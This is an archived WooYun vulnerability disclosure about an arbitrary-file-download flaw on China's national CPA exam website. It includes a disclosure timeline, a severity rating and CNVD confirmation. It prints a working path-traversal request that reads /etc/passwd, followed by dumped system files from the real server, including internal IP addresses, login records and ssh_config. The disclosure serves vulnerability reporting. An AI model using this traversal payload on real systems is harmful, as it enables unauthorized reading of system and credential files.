乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-28: 细节已通知厂商并且等待厂商处理中 2014-12-31: 厂商已经确认,细节仅向厂商公开 2015-01-10: 细节向核心白帽子及相关领域专家公开 2015-01-20: 细节向普通白帽子公开 2015-01-30: 细节向实习白帽子公开 2015-02-11: 细节向公众公开
全国注册会计师考试网任意文件下载
任意文件下载:
http://cpaexam.cicpa.org.cn/ArticleMngAction.do?filePath=/../../../etc/passwd%00.jpg&method=downFile
/etc/passwd:root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinrpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologinabrt:x:173:173::/etc/abrt:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinsaslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologinpostfix:x:89:89::/var/spool/postfix:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologintcpdump:x:72:72::/:/sbin/nologinoprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologinricci:x:140:140:ricci daemon user:/var/lib/ricci:/sbin/nologincicpa:x:500:500::/home/cicpa:/bin/bashweihu:x:501:501::/home/weihu:/bin/bash
Red Hat Enterprise Linux Server release 6.5 (Santiago)Kernel \r on an \mHOSTNAME=cpaexam0110.132.130.201 cpaexam0110.132.130.202 cpaexam0210.132.130.203 cpaexam03cicpa pts/0 10.132.128.43cicpa pts/0 10.132.135.235cicpa pts/0 10.132.144.234cicpa pts/0 10.132.144.239cicpa pts/1 10.132.128.43cicpa pts/1 10.132.135.235ssh_config:# $OpenBSD: ssh_config,v 1.25 2009/02/17 01:28:32 djm Exp $# This is the ssh client system-wide configuration file. See# ssh_config(5) for more information. This file provides defaults for# users, and the values can be changed in per-user configuration files# or on the command line.# Configuration data is parsed as follows:# 1. command line options# 2. user-specific file# 3. system-wide file# Any configuration value is only changed the first time it is set.# Thus, host-specific definitions should be at the beginning of the# configuration file, and defaults at the end.# Site-wide defaults for some commonly used options. For a comprehensive# list of available options, their meanings and defaults, please see the# ssh_config(5) man page.# Host *# ForwardAgent no# ForwardX11 no# RhostsRSAAuthentication no# RSAAuthentication yes# PasswordAuthentication yes# HostbasedAuthentication no# GSSAPIAuthentication no# GSSAPIDelegateCredentials no# GSSAPIKeyExchange no# GSSAPITrustDNS no# BatchMode no# CheckHostIP yes# AddressFamily any# ConnectTimeout 0# StrictHostKeyChecking ask# IdentityFile ~/.ssh/identity# IdentityFile ~/.ssh/id_rsa# IdentityFile ~/.ssh/id_dsa# Port 22# Protocol 2,1# Cipher 3des# Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc# MACs hmac-md5,hmac-sha1,[email protected],hmac-ripemd160# EscapeChar ~# Tunnel no# TunnelDevice any:any# PermitLocalCommand no# VisualHostKey noHost * GSSAPIAuthentication yes# If this option is set to yes then remote X11 clients will have full access# to the original X11 display. As virtually no X11 client supports the untrusted# mode correctly we set this to yes. ForwardX11Trusted yes# Send locale-related environment variables SendEnv LANG LC_CTYPE LC_NUMERIC LC_TIME LC_COLLATE LC_MONETARY LC_MESSAGES SendEnv LC_PAPER LC_NAME LC_ADDRESS LC_TELEPHONE LC_MEASUREMENT SendEnv LC_IDENTIFICATION LC_ALL LANGUAGE SendEnv XMODIFIERS
......
危害等级:中
漏洞Rank:8
确认时间:2014-12-31 17:16
CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。
暂无